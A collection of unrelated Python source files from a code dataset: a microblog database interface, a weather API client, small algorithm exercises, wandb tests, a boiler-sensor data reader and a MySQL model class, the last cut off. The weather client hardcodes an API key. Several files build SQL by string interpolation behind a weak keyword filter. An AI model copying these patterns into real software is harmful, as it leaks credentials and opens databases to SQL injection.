+{"seq_id":"616548054","text":"\"\"\"\n@author:\n\"\"\"\n\nimport sqlite3\nimport time\nimport cgi\nimport html\nimport re\n\ndef post_to_html(content):\n \"\"\"Convert a post to safe HTML, quote any HTML code, convert\n URLs to live links and spot any @mentions or #tags and turn\n them into links. Return the HTML string\"\"\"\n\n #convert <, >, & to safe html excluding quotes\n s = html.escape(content, False)\n\n #convert urls\n urls = re.compile(r\"((https?):((//)|(\\\\\\\\))+[\\w\\d:#@%/;$()~_?\\+-=\\\\\\.&]*)\", re.MULTILINE|re.UNICODE)\n\n #add anchor to link\n s = urls.sub(r\"\\1\", s)\n\n #add anchor to @users\n s = re.sub(r'(@)(\\w*\\.?\\w+)',r\"\\1\\2\", s)\n\n #return the formatted content\n return s\n\ndef post_list(db, usernick=None, limit=50):\n \"\"\"Return a list of posts ordered by date\n db is a database connection (as returned by COMP249Db())\n if usernick is not None, return only posts by this user\n return at most limit posts (default 50)\n\n Returns a list of tuples (id, timestamp, usernick, avatar, content)\n \"\"\"\n\n #create cursor to the database\n cursor = db.cursor()\n\n #If usernick is specified or not, find posts accordingly\n if usernick == None:\n #no user nick specified\n sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n FROM posts p, users u\n WHERE p.usernick=u.nick\n ORDER BY timestamp DESC\"\"\"\n\n #execute sql command, search user posts\n cursor.execute(sqlQuery)\n else:\n #user nick specified\n sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n FROM posts p, users u\n WHERE p.usernick = (?) AND p.usernick=u.nick\n ORDER BY timestamp DESC\"\"\"\n\n #execute sql command, search user posts with specified usernick\n cursor.execute(sqlQuery, (usernick,))\n\n #return all fetched posts\n return cursor.fetchall()[:limit]\n\n\ndef post_list_mentions(db, usernick, limit=50):\n \"\"\"Return a list of posts that mention usernick, ordered by date\n db is a database connection (as returned by COMP249Db())\n return at most limit posts (default 50)\n\n Returns a list of tuples (id, timestamp, usernick, avatar, content)\n \"\"\"\n\n #create cursor to the database\n cursor = db.cursor()\n\n #if user nick is specified or not, find mentions accordingly\n if usernick==None:\n sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n FROM posts p, users u\n WHERE p.usernick=u.nick AND p.content = '%@%'\n ORDER BY timestamp DESC\"\"\"\n\n #execute sql command, search post list mentions\n cursor.execute(sqlQuery)\n else:\n sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n FROM posts p, users u\n WHERE p.usernick=u.nick AND p.content LIKE ?\n ORDER BY timestamp DESC\"\"\"\n\n #add tags to the usernick to search, saerch post list mentions with specified usernick\n usernick = '%'+'@'+usernick+'%'\n\n #execute sql command\n cursor.execute(sqlQuery, (usernick,))\n\n #return all fetched results\n return cursor.fetchall()[:limit]\n\n\n\ndef post_add(db, usernick, message):\n \"\"\"Add a new post to the database.\n The date of the post will be the current time and date.\n\n Return a the id of the newly created post or None if there was a problem\"\"\"\n\n #check to see if the message length is below the threshold\n if len(message) <= 150:\n #create the cursor\n cursor = db.cursor()\n\n #sql query to execute\n sqlQuery = \"INSERT INTO posts(usernick, content) VALUES(?, ?)\"\n\n #execute the query with arguments, insert post into database\n cursor.execute(sqlQuery, (usernick, message,))\n\n #comit the connection\n db.commit()\n\n #return the ID of the last inserted object\n return cursor.lastrowid\n else:\n return None\n\n\n\n","sub_path":"comp249/assignment_2/part_2/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587020729","text":"import requests\nimport json\nimport geocoder\nimport logging\nfrom logging import config\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n})\n\n\n# Could use for the extra data\n\nclass Weather(object):\n\n @staticmethod\n def get_weather(city_name=None, country_code=None):\n \"\"\"\n Return the weather of the given city\n :param city_name: The name of the city whose weather we want\n :param country_code: The country code associated with that city\n :return: The dictionary of weather data\n \"\"\"\n if city_name is None and country_code is None:\n g = geocoder.ip('me')\n city_name = g.city\n country_code = g.country\n url = \"http://api.openweathermap.org/data/2.5/weather?q=\"\n key = \"a5e0c2f9d95a59f6cebcc153be85af60\"\n try:\n response = requests.post(url + city_name + \",\" + country_code.upper() + \"&\"\n + \"APPID=\" + key)\n if response.status_code == 200:\n data = json.loads(response.text)\n wtype = []\n for type in data['weather']:\n wtype.append(type['main'])\n wanted_data = {\n \"weather_type\": wtype,\n 'temperature': round(data['main'][\"temp\"] * 9 / 5 - 459.67, 2),\n 'pressure': data['main']['pressure'],\n 'humidity': data['main']['humidity'],\n 'visibility': data['visibility'],\n 'wind_speed': data['wind']['speed']\n }\n return wanted_data\n else:\n logging.error(\"Could not retrieve weather\")\n return {}\n except ConnectionError or ConnectionAbortedError or ConnectionResetError or TimeoutError:\n logging.error(\"Could not retrieve weather\")\n return {}\n","sub_path":"src/weather_client.py","file_name":"weather_client.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493662481","text":"'''\n@Author: Dayananda C\n@Date: 2021-09-11 \n@Time: 11:00:00\n@Last Modified by: Dayananda C\n@Title : A program with cubic running time. Read in N integers and counts the\nnumber of triples that sum to exactly 0\n'''\n\nfrom array import* \n\ndef SumOfIntegers() :\n try:\n \n length =int(input(\"Enter the length of array = \"))\n \n intArray = array('i' ,[])\n\n for i in range(length):\n values = int(input(\"Enter the value in array : \"))\n intArray.append(values)\n\n count =0\n for i in range(0,length):\n\n for j in range(i+1,length):\n\n for k in range(j+1,length):\n \n if(intArray[i] +intArray[j]+intArray[k] == 0):\n print(intArray[i],intArray[j],intArray[k]) \n count +=1 \n print(\"Number of triplets : {} \".format(count)) \n \n except ValueError :\n print(\"Please enter a valid input\")\n SumOfIntegers()\n\nprint(\"Enter the values for printing triples\")\nSumOfIntegers()","sub_path":"SumOfThreeIntegers.py","file_name":"SumOfThreeIntegers.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27319929","text":"import sys\n\nINF = sys.maxsize\n\ndx = [0,0,1,-1]\ndy = [1,-1,0,0]\n\n\ndef dijkstra(map_,N,cnt):\n dist = [[INF]*N for _ in range(N)]\n dist[0][0] = 0\n q= [[map_[0][0],0,0]]\n while(q):\n [w,y,x] = q.pop(0)\n if y== N-1 and x == N-1:\n print(\"Problem %d: %d\"%(cnt,w))\n break\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if(0<= ny < N and 0<= nx < N):\n nw = w + map_[ny][nx]\n if(nw < dist[ny][nx]):\n dist[ny][nx] = nw\n q.append([nw,ny,nx])\n q.sort()\n \n \ncnt =1 \nwhile(True):\n N = int(sys.stdin.readline())\n if N==0:\n break\n map_ = [[0]*N for _ in range(N)]\n for i in range(N):\n line = list(map(int,sys.stdin.readline().split()))\n map_[i]=line\n dijkstra(map_,N,cnt)\n cnt +=1\n ","sub_path":"2020_spring/2020_04_02/4485_GU.py","file_name":"4485_GU.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434174005","text":"def vol_alt(a,lst):\n '''Fonction renvoyant le temps de vol et l'altitude pour la suite de Syracuse.\n \n Paramètres : a (int) : Valeur > 0\n lst (liste) : liste vide\n\n >>>vol, alt = vol_alt(6,[])\n Temps de vol pour n = 5 : 8, altitude : 16\n \n '''\n lst.append(a)\n\n if a == 1 :\n return 0, lst\n elif a % 2 == 0 :\n vol,lst = vol_alt(a//2,lst) \n vol+=1\n return vol,lst\n else:\n vol,lst = vol_alt(3*a+1,lst) \n vol += 1\n return vol,lst\n\n'''vol, alt = vol_alt(36791537,[])\nalt = max(alt)\n\nprint('Temps de vol pour n = 5 : '+str(vol)+', altitude : '+str(alt))'''\n\nvol = 0\ni = 36791535\n\nwhile vol < 745 :\n\n\n vol, alt = vol_alt(i,[])\n alt = max(alt)\n\n i +=1\n\nprint('Temps de vol pour n = 5 : '+str(vol)+', altitude : '+str(alt))","sub_path":"Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129097677","text":"import wandb\nimport numpy as np\nimport PIL\nimport os\nfrom click.testing import CliRunner\n\nimage = np.random.randint(255, size=(28, 28))\n\n\ndef test_captions():\n wbone = wandb.Image(image, caption=\"Cool\")\n wbtwo = wandb.Image(image, caption=\"Nice\")\n assert wandb.Image.captions([wbone, wbtwo]) == [\"Cool\", \"Nice\"]\n\n\ndef test_transform():\n with CliRunner().isolated_filesystem():\n meta = wandb.Image.transform([wandb.Image(image)], \".\", \"test.jpg\")\n assert meta == {'_type': 'images',\n 'count': 1, 'height': 28, 'width': 28}\n assert os.path.exists(\"media/images/test.jpg\")\n\n\ndef test_guess_mode():\n image = np.random.randint(255, size=(28, 28, 3))\n wbimg = wandb.Image(image)\n assert wbimg.image.mode == \"RGB\"\n\n\ndef test_pil():\n pil = PIL.Image.new(\"L\", (28, 28))\n img = wandb.Image(pil)\n assert img.image == pil\n","sub_path":"tests/test_media.py","file_name":"test_media.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4041137","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 12 14:52:12 2018\n\n@author: 98089\n\"\"\"\n\n\nimport pandas as pd\nfrom abc import ABCMeta,abstractmethod\nfrom MySQLConnector import MySQLConnector\nimport re\nimport numpy as np\nfrom tools import tools_DateTimeTrans\n\n\nclass Abs_DataReader(object):\n __metaclass__ = ABCMeta\n def __init__(self,startDate,endDate):\n '''\n startDate:str,%Y-%m-%d %H:%M:%S\n endDate:str,%Y-%m-%d %H:%M:%S\n '''\n self.startDate = startDate\n self.endDate = endDate\n self._SQLState()\n self.dateIndex = pd.date_range(startDate,endDate,freq='1min')\n \n \n @abstractmethod\n def _SQLState(self):\n '''\n 不同的项目有不同的查询语句,所以该方法需要被子类重载以生成合适的SQL语句。该方法应该生成三条SQL语句,分别是\n _QueryBoilerState:查询目标时间段的锅炉相关数据\n _QueryWeatherState:查询目标时间段的室外气象站相关数据\n _QueryInHomeState:查询目标时间段的室内温湿度传感器数据\n _QueryHRZState:查询目标时间段的换热站相关数据\n\n 参数:\n startDate:\"%Y-%m-%d %H:%M:%D\"\n 查询数据的开始时间\n endDate:\"%Y-%m-%d %H:%M:%D\"\n 查询数据的结束时间\n \n 提供的全局变量:\n self._QueryBoilerState:查询目标时间段的锅炉相关数据\n self._QueryWeatherState:查询目标时间段的室外气象站相关数据\n self._QueryInHomeState:查询目标时间段的室内温湿度传感器数据\n self._QueryHRZState:查询目标时间段的换热站相关数据\n \n '''\n @abstractmethod\n def _BoilerColumnsMap(self):\n '''\n 子类应该重载该方法以解决数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n @abstractmethod\n def _WeatherColumnsMap(self):\n '''\n 子类应该重载该方法以解决室外气象站数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n @abstractmethod\n def _InHomeColumnsMap(self):\n '''\n 子类应该重载该方法以解决室内温湿度数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n @abstractmethod\n def _CollectInHomeDeviceID(self):\n \"\"\"\n 子类应该重载该方法以返回所有的室内传感器的设备ID\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 该方法应该返回一个List,该List包含全部的室内传感器设备ID\n \"\"\"\n @abstractmethod\n def _unnormalDataPrecess(self,a,b,c,d):\n \"\"\"\n 子类应该重载该方法以提供一种对缺失值和异常值进行处理的机制\n \n 参数:DataFrame\n a: 对应锅炉数据\n b: 对应天气数据\n c: 对应室内传感器数据\n \n 提供的全局变量:\n 无\n \n 返回值:DataFrame\n 对异常值和缺失值进行修正之后的数据集\n \"\"\"\n @abstractmethod\n def _HRZColumnsMap(self):\n '''\n 子类应该重载该方法以解决室内温湿度数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n def concatData(self,a,b,c,d):\n \"\"\"\n a: 对应锅炉数据\n b: 对应天气数据\n c: 对应室内传感器数据\n d: 对应换热站数据\n \"\"\"\n a,b,c,d = self._unnormalDataPrecess(a,b,c,d)\n # 做mean操作的时候不太存在掩盖缺失值的风险,做interpolate操作时有较大的掩盖缺失值的风险\n totalData = pd.DataFrame(index=self.dateIndex)\n \n if self.BoilerFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n _locals = locals()\n exec(\"modified_A = a.resample('1min').%s()\"%method,globals(),_locals)\n modified_A = _locals['modified_A']\n for item in modified_A:\n totalData[item] = modified_A[item]\n if self.WeatherFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n _locals = locals()\n exec(\"modified_B = b.resample('1min').%s()\"%method,globals(),_locals)\n modified_B = _locals['modified_B']\n for item in modified_B:\n totalData[item] = modified_B[item]\n if self.InHomeFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n for item in c:\n _locals = locals()\n exec(\"modified_Item = item.resample('1min').%s()\"%method,globals(),_locals)\n modified_Item = _locals['modified_Item']\n for i in modified_Item:\n totalData[i] = modified_Item[i]\n if len(d) > 0:\n if self.HRZFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n _locals = locals()\n exec(\"modified_D = d.resample('1min').%s()\"%method,globals(),_locals)\n modified_D = _locals['modified_D']\n for item in modified_D:\n totalData[item] = modified_D[item]\n totalData = self.extremeValuePrecess(totalData)\n return totalData\n \n def extremeValuePrecess(self,Data):\n for itemname in Data:\n itemList = Data[itemname].tolist()\n sortedItemList = np.sort(itemList)\n sortedItemList = [k for k in sortedItemList if not np.isnan(k)]\n try:\n n05PointIndex = int(len(sortedItemList) * 0.001)\n n95PointIndex = int(len(sortedItemList) * 0.999)\n n05Point = sortedItemList[n05PointIndex]\n n95Point = sortedItemList[n95PointIndex]\n newItemList = []\n for i in itemList:\n if np.isnan(i):\n newItemList.append(i)\n else:\n newItemList.append(max(min(i,n95Point),n05Point))\n Data[itemname] = newItemList\n except IndexError:\n continue\n return Data\n \n \n def readData(self):\n # 建立对数据库的连接\n conn = MySQLConnector()\n conn.openConnector()\n # ++++++++++++++ 查询锅炉状态 +++++++++++++++++++++++++++++++++++\n # 从SQL语句中分析所需要抓取的字段名模式\n columnsPattern = re.compile(\"SELECT DISTINCT (.*?) FROM\")\n columnsStr = re.findall(columnsPattern,self._QueryBoilerState)[0]\n columns = columnsStr.strip().split(',')\n columns = [(c.strip())[2:] for c in columns]\n # 对字段名进行修正\n if len(self._BoilerColumnsMap()) != 0:\n columns = [self._BoilerColumnsMap()[c] for c in columns]\n # 游标执行查询锅炉状态数据的语句\n conn.cursor.execute(self._QueryBoilerState)\n tempBoilerState = np.array(conn.cursor.fetchall())\n # 对该数据集中日期时间进行修正\n modifiedTime = [tools_DateTimeTrans(i) for i in tempBoilerState[:,0]]\n BoilerData = pd.DataFrame(np.array(tempBoilerState[:,1:],np.float32),index=modifiedTime,\n columns=columns[1:])\n # ++++++++++++++ 查询锅炉状态 +++++++++++++++++++++++++++++++++++\n # ++++++++++++++ 查询天气状态 +++++++++++++++++++++++++++++++++++\n # 从SQL语句中分析所需要抓取的字段名模式\n columnsStr = re.findall(columnsPattern,self._QueryWeatherState)[0]\n columns = columnsStr.strip().split(',')\n columns = [c.strip()[2:] for c in columns]\n # 对字段名进行修正\n if len(self._WeatherColumnsMap()) != 0:\n columns = [self._WeatherColumnsMap()[c] for c in columns]\n # 游标执行查询天气状态数据的语句\n conn.cursor.execute(self._QueryWeatherState)\n tempWeatherState = np.array(conn.cursor.fetchall())\n modifiedTime = [tools_DateTimeTrans(i) for i in tempWeatherState[:,0]]\n WeatherData = pd.DataFrame(np.array(tempWeatherState[:,1:],np.float32),index = modifiedTime,\n columns=columns[1:])\n # ++++++++++++++ 查询天气状态 +++++++++++++++++++++++++++++++++++\n # ++++++++++++++ 查询室内状态 +++++++++++++++++++++++++++++++++++\n dev_ids = self._CollectInHomeDeviceID()\n dev_DataFrames = []\n for k,dev_id in enumerate(dev_ids):\n # 生成每一个设备对应的SQL语句\n individualDevSQL = self._QueryInHomeState%(dev_id)\n # 从SQL语句中抽取所抽取的字段\n columnsStr = re.findall(columnsPattern,individualDevSQL)[0]\n # 对字段名称进行修正\n columns = columnsStr.strip().split(',')\n columns = [c.strip()[2:] for c in columns]\n if len(self._InHomeColumnsMap()) != 0:\n columns = [self._InHomeColumnsMap()[c] for c in columns]\n columns = [u'%d#传感器%s'%(k,c) for c in columns]\n # 游标执行查询室内状态数据的语句\n conn.cursor.execute(individualDevSQL)\n tempInHomeState = np.array(conn.cursor.fetchall())\n try:\n modeifiedTime = [tools_DateTimeTrans(i) for i in tempInHomeState[:,0]]\n InHomeData = pd.DataFrame(np.array(tempInHomeState[:,1:],np.float32),index = modeifiedTime,\n columns=columns[1:])\n dev_DataFrames.append(InHomeData)\n except IndexError:\n print(u'%d#室内传感器无数据'%k)\n continue\n # ++++++++++++++ 查询室内状态 +++++++++++++++++++++++++++++++++++\n # ++++++++++++++ 查询换热站状态 +++++++++++++++++++++++++++++++++\n if self._QueryHRZState != False:\n # 从SQL语句中分析所需要抓取的字段名模式\n columnsStr = re.findall(columnsPattern,self._QueryHRZState)[0]\n columns = columnsStr.strip().split(',')\n columns = [c.strip()[2:] for c in columns]\n # 对字段名进行修正\n if len(self._HRZColumnsMap()) != 0:\n columns = [self._HRZColumnsMap()[c] for c in columns]\n # 游标执行查询天气状态数据的语句\n conn.cursor.execute(self._QueryHRZState)\n tempHRZState = np.array(conn.cursor.fetchall())\n modifiedTime = [tools_DateTimeTrans(i) for i in tempHRZState[:,0]]\n HRZData = pd.DataFrame(np.array(tempHRZState[:,1:],np.float32),index = modifiedTime,\n columns=columns[1:])\n else:\n HRZData = pd.DataFrame()\n totalData = self.concatData(BoilerData,WeatherData,dev_DataFrames,HRZData)\n return totalData\n\nclass XK(Abs_DataReader):\n # 必要的参数\n substationID = 24\n code = 'N1'\n BoilerFreq = 1\n WeatherFreq = 60\n InHomeFreq = 120\n HRZFreq = 1\n \n def _SQLState(self):\n self._QueryBoilerState = u\"SELECT DISTINCT a.create_time,a.节能器出水温度1,\\\n a.炉膛压力1,a.出水温度1,a.室外温度1,a.炉膛温度1,a.目标温度设定1,a.回水温度1,a.鼓风机电流1,\\\n a.回水压力1,a.空预器出口风温1,a.出水压力1,a.节能器出水压力1,a.排烟温度1,a.节能器进口烟温1,a.鼓风机频率1,a.节能器进水温度1,a.FI001A,b.瞬时流量,b.温度 FROM bd_xinkou_1 a LEFT JOIN bd_xinkou_2 b on a.create_time = b.create_time WHERE a.create_time > '%s' AND a.create_time < '%s'\"%(self.startDate,self.endDate)\n self._QueryWeatherState = \"SELECT DISTINCT t.create_time,t.temp,t.hr,t.lux,t.wind_speed,t.wind_direction \\\n FROM bd_weather_station t WHERE dev_id=40002704 and create_time > '%s' and create_time < '%s'\"%(self.startDate,self.endDate)\n self._QueryInHomeState = \"SELECT DISTINCT t.create_time,t.temp,t.hr FROM bd_temp_hr t WHERE dev_id='%s' AND\" + \" create_time > '%s' AND create_time < '%s'\"%(self.startDate,self.endDate)\n self._QueryHRZState = u\"SELECT DISTINCT t.create_time,t.一次供温度,t.一次回温度,t.二次供温度,t.二次回温度,t.二次供压力 FROM bd_xinkou_hrz t WHERE project_sub_station_id=%d and code='%s' and t.create_time>'%s' and t.create_time<'%s'\"%(self.substationID,self.code,self.startDate,self.endDate)\n \n def _BoilerColumnsMap(self):\n return {'create_time':'create_time',u'节能器出水温度1':u'节能器出水温度',\n u'炉膛压力1':u\"炉膛压力\",u'出水温度1':u'出水温度',u'室外温度1':u\"室外温度\",\n u'炉膛温度1':u'炉膛温度',u'目标温度设定1':u\"目标温度设定\",u'回水温度1':u'回水温度',\n u'鼓风机电流1':u\"鼓风机电流\",u\"回水压力1\":u\"回水压力\",u\"出水压力1\":u'出水压力',\n u'节能器出水压力1':u\"节能器出水压力\",u'排烟温度1':u\"排烟温度\",u'节能器进口烟温1':u\"节能器进口烟温\",\n u\"鼓风机频率1\":u\"鼓风机频率\",u'节能器进水温度1':u\"节能器进水温度\",u'瞬时流量':u\"瞬时流量\",\n u\"温度\":u\"燃气温度\",u'FI001A':u'供水流量',u'空预器出口风温1':u'空预器出口风温',u'二次供压力':u'二次供压力'}\n \n def _WeatherColumnsMap(self):\n return {\"temp\":u\"气象站室外温度\",'hr':u'气象站室外湿度','lux':u\"气象站室外光照\",\n 'wind_speed':u\"气象站室外风速\",'wind_direction':u'气象站室外风向',\n 'create_time':'create_time'}\n \n def _InHomeColumnsMap(self):\n return {\"temp\":u\"室内温度\",'hr':u\"室内湿度\",'create_time':'create_time'}\n \n def _HRZColumnsMap(self):\n return {}\n \n def _CollectInHomeDeviceID(self):\n return [\"W634iMCwmSCcjQkltb7d38btv000%02d\"%i for i in [18,6,23,1,13,12,4,5,24,14]]\n \n def _unnormalDataPrecess(self,a,b,c,d):\n # 对气象数据中的光照进行修正\n temp = []\n for item in b[u'气象站室外光照'].as_matrix():\n if item < -50:\n temp.append(31000)\n elif item < 0:\n temp.append(0)\n else:\n temp.append(item)\n b[u'气象站室外光照'] = temp\n \n temp = []\n for item in b[u'气象站室外风向'].as_matrix():\n if item > 45 - 22.5 and item < 45 + 22.5:\n temp.append([1,0,0,1])\n elif item > 90 -22.5 and item < 90+22.5:\n temp.append([1,0,0,0])\n elif item > 135 - 22.5 and item < 135 + 22.5:\n temp.append([1,0,1,0])\n elif item > 180 - 22.5 and item < 180 + 22.5:\n temp.append([0,0,1,0])\n elif item > 225 - 22.5 and item < 225 + 22.5:\n temp.append([0,1,1,0])\n elif item > 270 - 22.5 and item < 227 + 22.5:\n temp.append([0,1,0,0])\n elif item > 315 - 22.5 and item < 315 + 22.5:\n temp.append([0,1,0,1])\n elif item > 315 + 22.5 or item < 22.5:\n temp.append([0,0,0,1])\n else:\n try:\n temp.append(temp[-1])\n except IndexError:\n temp.append([0,0,0,0])\n temp = np.array(temp)\n b[u'气象站室外风向(东风)'] = temp[:,0]\n b[u'气象站室外风向(西风)'] = temp[:,1]\n b[u'气象站室外风向(南风)'] = temp[:,2]\n b[u'气象站室外风向(北风)'] = temp[:,3]\n return a,b,c,d ","sub_path":"DataReader.py","file_name":"DataReader.py","file_ext":"py","file_size_in_byte":17096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"379107907","text":"class Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n if len(matrix) == 0:\n return False\n if len(matrix[0]) == 0:\n return False\n \n for i in range(len(matrix)):\n if matrix[i][len(matrix[i])-1] >= target:\n return self.find_target(matrix[i],target)\n return False\n def find_target(self,find_list,target):\n head = 0\n tail = len(find_list) - 1\n while head <= tail:\n mid = (head+tail)//2\n if find_list[mid] > target:\n tail = mid-1\n elif find_list[mid] < target:\n head = mid+1\n else:\n return True\n return False","sub_path":"74. 搜索二维矩阵.py","file_name":"74. 搜索二维矩阵.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238955332","text":"import re\nimport pymysql\nfrom app.Env import Env\nfrom app.common.Base import Base\nfrom dbutils.pooled_db import PooledDB\n\n# 数据库\nclass Model(Base) :\n\n __conn = None #链接\n __rollback = False #回滚\n __cs = None #游标\n __id = 'id' #主键\n __idVal = 0 #自增ID\n __table = '' #数据表\n __columns = '*' #字段\n __where = '' #条件\n __group = '' #分组\n __order = '' #排序\n __limit = '' #限制\n __sql = '' #单条SQL\n __fields = {} #字段&数据\n __sql_reg = r\"(?:')|(?:--)|(/\\*(?:.|[\\n\\r])*?\\*/)|(\\b(select|select|update|union|and|or|delete|insert|trancate|char|into|substr|ascii|declare|exec|count|master|into|drop|execute)\\b)\"\n\n # 链接\n def __connect(self,type='pool') :\n cfg = Env.db()\n if type=='pool' :\n pool = PooledDB(**cfg)\n return pool.connection()\n else :\n return pymysql.Connect(\n host=cfg['host'],\n port=cfg['port'],\n user=cfg['user'],\n passwd=cfg['password'],\n db=cfg['db'],\n charset=cfg['charset'],\n )\n\n # 设置主键\n def setPrimaryKey(self,name) : self.__id=name\n # 设置数据表\n def setSource(self,name) : self.__table=name\n\n # 返回SQL\n def getSql(self): return self.__sql\n\n # 查询-单条\n def findFirst(self):\n self.__limit = '0,1'\n self.__getSelect() #生成SQL\n # 执行\n res = self.executeQuery(self.__sql)\n data = {}\n if res['state'] : data=res['list'][0]\n return data\n # 查询-多条\n def find(self):\n self.__getSelect() #生成SQL\n # 执行\n res = self.executeQuery(self.__sql)\n data = {}\n if res['state'] : data=res['list']\n return data\n # 统计条数\n def count(self):\n sql = 'SELECT count(*) as total FROM %s'%(self.__table)\n if self.__where!='' : sql += \" WHERE \"+self.__where\n # 执行\n res = self.executeQuery(sql)\n total = 0\n if res['state'] : total=res['list'][0]['total']\n return total\n # 查询-生成\n def __getSelect(self):\n sql = 'SELECT %s FROM %s'%(self.__columns, self.__table)\n if self.__where!='' : sql += \" WHERE \"+self.__where\n if self.__group!=\"\" : sql += \" GROUP BY \"+self.__group\n if self.__order!=\"\" : sql += \" ORDER BY \"+self.__order\n if self.__limit!=\"\" : sql += \" LIMIT \"+self.__limit\n self.__sql = sql\n\n # 新增\n def create(self):\n self.__sql = '' #默认SQL\n self.__callback('beforeCreate') #回调函数\n self.__getAllFields() #全部字段\n # 组合\n keys = self.__fields.keys()\n vals = ''\n for k in keys :\n if k==self.__id and (self.__fields[k]==None or self.__fields[k]=='null') : vals += 'null,'\n else : vals += '%s,'%self.__fields[k] if (self.__fields[k]==None or self.__fields[k]=='null') else '\"%s\",'%self.filter(self.__fields[k])\n self.__sql = 'INSERT INTO `%s`(`%s`) values(%s)'%(self.__table,'`,`'.join(keys),vals[:-1])\n # 执行\n res = self.executeQuery(self.__sql)\n return True if res['state'] else False\n # 获取自增ID\n def getLastID(self):\n return self.__idVal\n\n # 更新\n def update(self):\n self.__sql = '' #默认SQL\n self.__callback('beforeUpdate') #回调函数\n self.__getAllFields() #全部字段\n # 组合\n keys = self.__fields.keys()\n vals = ''\n for k in keys:\n vals += '%s=%s,'%(k,'null') if self.__fields[k]==None or self.__fields[k]=='null' else '%s=\"%s\",'%(k,self.filter(self.__fields[k]))\n self.__sql = 'UPDATE `%s` SET %s WHERE %s'%(self.__table,vals[:-1], self.__where)\n # 执行\n res = self.executeQuery(self.__sql)\n return True if res['state'] else False\n\n # 删除\n def delete(self):\n self.__sql = '' #默认SQL\n self.__callback('beforeDelete') #回调函数\n self.__sql = 'DELETE FROM `%s` WHERE %s'%(self.__table, self.__where)\n # 执行\n res = self.executeQuery(self.__sql)\n return True if res['state'] else False\n\n # Where 条件\n def where(self,where,bind={}):\n # 过滤WHERE\n if len(bind)>0 : where=self.bindWhere(where,bind)\n if where=='' : self.error('Where不能为空!')\n self.__where = where\n return self\n # Table 数据表\n def table(self,str=''):\n self.__table = str\n return self\n # Columns 字段\n def columns(self,str='*'):\n self.__columns = str\n return self\n # Group 分组\n def group(self,str=''):\n self.__group = str\n return self\n # Order 排序\n def order(self,str=''):\n self.__order = str\n return self\n # Limit 限制\n def limit(self,str=''):\n self.__limit = str\n return self\n # 过滤-SQL\n def filter(self, v=''):\n return re.sub(r'.*([\\';]+|(--)+).*','',str(v))\n # 过滤-WHERE\n def bindWhere(self,where,bind):\n for k in bind.keys() :\n v = str(bind[k])\n # 小写、匹配、替换\n lower = v.lower()\n if re.search(self.__sql_reg,lower) :\n print('SQL过滤: '+v)\n return ''\n where = re.sub(r':'+k+':', v, where)\n return where\n\n # 事务-回滚\n def begin(self):\n Model.__rollback = True\n def commit(self):\n Model.__rollback = False\n if Model.__conn!=None :\n Model.__conn.commit()\n Model.__conn.close()\n Model.__conn = None\n\n # 执行SQL\n def executeQuery(self,sql,bind={}):\n __conn = None\n __cs = None\n res = {}\n # 过滤SQL\n if len(bind)>0 : sql=self.bindWhere(sql,bind)\n try:\n # 回滚\n if Model.__rollback :\n if Model.__conn==None : Model.__conn = __conn = self.__connect('rollback')\n else : __conn = Model.__conn\n else : __conn = self.__connect()\n # 类型\n type = sql[0:1].lower()\n if type=='s' :\n # 查询\n __cs = __conn.cursor(cursor=pymysql.cursors.DictCursor)\n num = __cs.execute(sql)\n list = __cs.fetchall()\n list = {} if list==None else list\n res = {'state':True if num>0 else False,'num':num,'list':list}\n else :\n __cs = __conn.cursor()\n num = __cs.execute(sql)\n res = {'state':True,'num':num}\n if type=='i' :\n self.__idVal = __cs.lastrowid\n res['id'] = self.__idVal\n # 提交\n if not Model.__rollback : __conn.commit()\n except Exception as e:\n if Model.__rollback and __conn!=None : 